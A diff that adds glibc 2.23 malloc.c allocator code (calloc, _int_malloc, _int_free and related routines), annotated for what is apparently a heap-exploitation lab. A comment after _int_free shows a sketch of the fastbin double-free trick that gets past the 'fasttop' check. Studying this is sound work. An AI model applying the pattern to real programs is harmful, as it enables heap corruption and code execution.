+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
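+  /* For example, assuming MALLOC_ALIGNMENT == 16: a requested alignment of
+     48 is not a power of two, so the loop starts at 32 and doubles to 64,
+     which is the alignment actually used.  */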
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
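+  /* Where INTERNAL_SIZE_T is 8 bytes, HALF_INTERNAL_SIZE_T is 1 << 32: if
+     both n and elem_size are below it their product cannot overflow, so
+     the (comparatively expensive) division check above only runs when at
+     least one operand is large.  */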
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
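+  /* csz is a multiple of 2 * SIZE_SZ, so clearsize is an odd number of
+     INTERNAL_SIZE_T words; the smallest chunk that can reach this point
+     spans at least 4 * SIZE_SZ, hence nclears >= 3.  */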
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
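+      /* The compare-and-exchange loop above pops the head of the singly
+         linked fastbin without taking the arena lock; the only sanity
+         check applied to the popped chunk is the size/index comparison
+         below.  */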
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+              if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the
+     remainder from the most recent non-exact fit.  Place other traversed
+     chunks in bins.  Note that this step is the only place in any routine
+     where chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
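+              /* In large bins, fd_nextsize/bk_nextsize link the first
+                 chunk of each distinct size into a second, size-sorted
+                 list; a chunk alone in its bin simply points at itself.  */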
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
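+          /* Bound the amount of unsorted-bin processing done on behalf of
+             a single request; chunks not examined stay in the unsorted
+             list for later calls.  */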
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+                  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
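+
+/*
+   A minimal user-level sketch of the path above (assuming the glibc 2.23
+   build bundled with this lab, i.e. no tcache, single thread, fresh heap;
+   sizes are illustrative).  A freed non-fast chunk is parked in the
+   unsorted bin, sorted into its bin on the next request, then split
+   best-fit, so the smaller allocation usually reuses the old address and
+   the remainder becomes av->last_remainder:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       char *big   = malloc (0x500);   // too big for a fastbin
+       char *guard = malloc (0x20);    // keeps "big" from merging into top
+       free (big);                     // big now sits in the unsorted bin
+
+       char *small = malloc (0x100);   // typically carved out of "big"
+       printf ("big   = %p\n", (void *) big);
+       printf ("small = %p\n", (void *) small);  // usually the same address
+
+       free (small);
+       free (guard);
+       return 0;
+     }
+*/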
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+           of system_mem might have led to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
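+
+/*
+   The fasttop check above only compares against the current head of the
+   fastbin, which is why the classic fastbin double free interleaves a
+   second victim.  A sketch (glibc 2.23-style fastbins assumed, sizes
+   illustrative):
+
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       char *a = malloc (0x20);   // fastbin-sized
+       char *b = malloc (0x20);
+
+       free (a);
+       // free (a);               // aborts: "double free or corruption (fasttop)"
+       free (b);                  // b is now the fastbin head...
+       free (a);                  // ...so a second free of a passes the check
+       return 0;
+     }
+*/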
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
